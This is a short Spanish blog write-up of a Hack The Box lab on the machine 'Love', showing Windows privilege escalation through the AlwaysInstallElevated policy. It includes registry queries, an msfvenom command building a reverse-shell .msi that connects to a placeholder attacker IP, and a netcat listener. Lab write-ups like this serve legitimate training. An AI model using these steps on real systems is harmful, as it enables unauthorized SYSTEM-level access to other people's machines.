DaVinci>Root

Love HTB Escalando Privilegio

Love HTB

Presentación

En esta ocasión estaré presentando otra escalada de privilegio en windows y es abusando de: AlwaysInstallElevated, me había tomado tiempo la preparación de algunos writeUp, ya que estuve preparandome para el eJPT el cual logramos obtener, tesis, mudanza y otras movidas como seguir con networking y firewall desde EVE-NG, pronto.. 🤯.

WinPEAS

En la fase de búsqueda de privilegias, WinPeas nos presenta el siguiente setting:

Love HTB Escalando Privilegio

Este key registry significa que cualquier usuario puede instalar un archivo .msi con privilegios de NT Authority\System.

Enumeración Manual

Puedes hacer la solicitud al registro de manera manual con los siguientes comandos:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

el regultado de ambos query debe devolver el valor 1, es decir (value is 0x1), de lo contrario sera imposible explotar dicha vulnerabilidad.

¿Qué hago ahora?

Podemos generar un archivo malicoiso .msi con msfvenom.

 msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
 

Love HTB Escalando Privilegio

Podemos ponernos en escucha por el puerto especificado en el payload, o hacer uso del exploit/multi/handler.

rlwrap nc -nlvp 443
 

Transferimos el archivo setup.msi a la máquina víctima, en esta ocasión haciendo uso de certutil.exe, como podemos ver a continuación.

Love HTB Escalando Privilegio

En nuestro caso lo depositamos en la siguiente ruta.

C:\Windows\Temp\priv\setup.msi

PoC

Ejecutamos el siguiente comando a la vez que nos mantenemos en escucha en nuestra máquina.

Love HTB Escalando Privilegio

al instante recibimos nuestra conexión. Love HTB Escalando Privilegio

🖱️by: @DaVinciRoot